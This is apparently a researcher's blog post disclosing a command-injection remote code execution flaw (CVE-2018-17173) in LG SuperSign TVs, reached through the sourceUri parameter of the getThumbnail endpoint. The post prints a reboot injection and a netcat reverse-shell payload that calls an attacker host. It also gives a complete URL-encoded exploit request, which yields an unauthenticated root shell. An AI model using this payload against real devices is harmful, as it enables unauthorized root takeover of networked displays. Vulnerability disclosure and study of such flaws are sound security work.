Publishing the previous vulnerabilities in LG SuperSign TVs left me a bad taste in my mouth. Something like "I know that there must be something more". So, I continued with my research and finally found the precious RCE.
This vulnerability has been addressed with the following CVE-2018-17173
The vuln
Playing with the app through burp I saw a url with some parameters. These URL is requested when the application needs to load the thumbnails of the images the user has uploaded.
So, I started to fuzz these parameters with ZAP until I found something interesting:
The application responded with the help screen of some utility called luna-send when the parameter sourceUri received the values "' or 1 --'". It looked like it was triggering a command that was calling this utility but failling due to an unexpected parameter. Cleaning a little bit the input I found that with the value ' -' it was enough to receive this response. I knew I was close.
If you see something like that in the response you immediately start to play with things like ;command, ;command;, etc, etc. After some failed attemps I tried with ' -;reboot;' and I saw how the TV was rebooting...the RCE was knocking on my door.
Getting a Shell
Taking advantage of the LFI, I knew that the TV had a netcat but was the netcat version that doesn't support the -e option (downloading the binary), so I used the alternative:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
Encoded all to be passed in the URL
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E
%261%7Cnc%20ATTACKER_IP%20PORT%20%3E%2Ftmp%2Ff
So, the payload was ready:
' -;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i
%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE_PORT%20%3E%2Ftmp%2Ff;'
Putting it all together:
http://LG_SuperSign_IP:9080/qsr_server/device/getThumbnail?sourceUri=
%27%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2F
bin%2Fsh%20-i%202%3E%261%7Cnc%20ATTACKER_MACHINE_IP%20ATTACKER_MACHINE__PORT
%20%3E%2Ftmp%2Ff;%27&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&
targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
I launched netcat to catch the shell, made the request and...
I was in.
In a few days I'll be updating this post with more technical details.
That is all for now.
Points to take into account:
-No need to be authenticated
-No need to privilege escalation (app is running as root)